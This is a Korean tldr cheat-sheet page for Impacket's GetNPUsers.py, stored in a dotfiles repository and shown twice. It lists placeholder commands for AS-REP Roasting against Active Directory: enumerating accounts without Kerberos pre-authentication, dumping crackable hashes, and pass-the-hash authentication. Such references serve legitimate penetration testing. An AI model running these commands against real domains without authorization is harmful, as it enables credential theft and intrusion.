DOT-Files/Gentoo/gentooamd/home/user/.tldrc/tldr/pages.ko/common/getnpusers.py.md

# GetNPUsers.py

> Kerberos 사전 인증이 비활성화된 Active Directory 계정을 열거하며, AS-REP Roasting 공격에 취약할 수 있음.
> Impacket 도구 모음의 일부.
> 더 많은 정보: <https://github.com/fortra/impacket>.

- Kerberos 사전 인증이 비활성화된 사용자 열거 (기본 익명 열거):

`GetNPUsers.py {{도메인}}/ -usersfile {{경로/대상/사용자_목록}} -dc-ip {{도메인_컨트롤러_ip}} -no-pass`

- AS-REP Roasting을 수행하고 오프라인 크래킹 가능한 해시 덤프:

`GetNPUsers.py {{도메인}}/ -usersfile {{경로/대상/사용자_목록}} -dc-ip {{도메인_컨트롤러_ip}} -no-pass -request`

- 익명 바인딩이 비활성화된 경우 유효한 자격 증명으로 인증:

`GetNPUsers.py {{도메인}}/{{username}}:{{password}} -usersfile {{경로/대상/사용자_목록}} -dc-ip {{도메인_컨트롤러_ip}}`

- 비밀번호 대신 pass-the-hash 인증 사용:

`GetNPUsers.py {{도메인}}/{{username}} -hashes {{LM_Hash}}:{{NT_Hash}} -usersfile {{경로/대상/사용자_목록}} -dc-ip {{도메인_컨트롤러_ip}}`

- 추가 분석을 위해 출력을 파일로 저장:

`GetNPUsers.py {{도메인}}/ -usersfile {{경로/대상/사용자_목록}} -dc-ip {{도메인_컨트롤러_ip}} -request > {{경로/대상/출력파일.txt}}`
Automated updated process of shell scripts and DOT Files (gentooamd) 2026-06-12 17:51:25 -06:00			`# GetNPUsers.py`

			`> Kerberos 사전 인증이 비활성화된 Active Directory 계정을 열거하며, AS-REP Roasting 공격에 취약할 수 있음.`
			`> Impacket 도구 모음의 일부.`
			`> 더 많은 정보: <https://github.com/fortra/impacket>.`

			`- Kerberos 사전 인증이 비활성화된 사용자 열거 (기본 익명 열거):`

			`GetNPUsers.py {{도메인}}/ -usersfile {{경로/대상/사용자_목록}} -dc-ip {{도메인_컨트롤러_ip}} -no-pass`

			`- AS-REP Roasting을 수행하고 오프라인 크래킹 가능한 해시 덤프:`

			`GetNPUsers.py {{도메인}}/ -usersfile {{경로/대상/사용자_목록}} -dc-ip {{도메인_컨트롤러_ip}} -no-pass -request`

			`- 익명 바인딩이 비활성화된 경우 유효한 자격 증명으로 인증:`

			`GetNPUsers.py {{도메인}}/{{username}}:{{password}} -usersfile {{경로/대상/사용자_목록}} -dc-ip {{도메인_컨트롤러_ip}}`

			`- 비밀번호 대신 pass-the-hash 인증 사용:`

			`GetNPUsers.py {{도메인}}/{{username}} -hashes {{LM_Hash}}:{{NT_Hash}} -usersfile {{경로/대상/사용자_목록}} -dc-ip {{도메인_컨트롤러_ip}}`

			`- 추가 분석을 위해 출력을 파일로 저장:`

			`GetNPUsers.py {{도메인}}/ -usersfile {{경로/대상/사용자_목록}} -dc-ip {{도메인_컨트롤러_ip}} -request > {{경로/대상/출력파일.txt}}`